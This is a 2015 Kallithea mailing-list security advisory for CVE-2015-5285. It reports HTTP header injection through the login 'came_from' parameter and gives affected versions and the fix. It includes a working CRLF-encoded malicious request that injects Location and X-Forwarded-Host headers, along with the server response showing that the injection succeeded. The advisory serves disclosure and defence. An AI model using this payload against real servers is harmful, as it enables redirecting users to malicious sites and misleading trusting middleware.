[SECURITY ISSUE] CVE-2015-5285: HTTP header injection
Andrew Shadura
andrew at shadura.me
Fri Oct 2 20:19:16 UTC 2015
HTTP header injection
Synopsis
========
A vulnerability has been found in Kallithea, allowing attackers to inject
arbitrary headers into the server response for certain URLs.
Description
===========
HTTP header injection was possible in login-related code of Kallithea,
allowing
attackers to inject arbitrary headers into the server responses.
The vulnerability affects the `came_from` `GET` parameter.
Example of a malicious request:
GET
/_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk
HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie:
kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438
Corresponding response:
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress
<html>
<head>
<title>302 Found</title>
</head>
<body>
<h1>302 Found</h1>
The resource was found at <a href="http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk </a>;
you should be redirected automatically.
</body>
</html>
Impact
======
The bug allows an attacker to override important response headers,
possibly redirecting users
to a malicious website or make other middleware misbehave when it trusts
the response headers.
Resolution
==========
The Kallithea project has fixed this issue in the stable branch. Users
are recommended to
upgrade to the latest 0.3 release.
Affected versions
=================
The issue is present in Kallithea versions before 0.3.
Acknowledgments
===============
Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.
References
==========
[1] CVE-2015-5285
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285>
[2] Kallithea: Security Notice CVE-2015-5285
<https://kallithea-scm.org/security/cve-2015-5285.html>
[3] Mercurial changeset fixing the issue
<https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>
[4] Zero Science Lab
<http://www.zeroscience.mk/en/>
--
Cheers,
Andrew Shadura
on behalf of Kallithea Security Team
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 473 bytes
Desc: OpenPGP digital signature
URL: <http://lists.sfconservancy.org/pipermail/kallithea-general/attachments/20151002/e981d509/attachment.sig>
More information about the kallithea-general
mailing list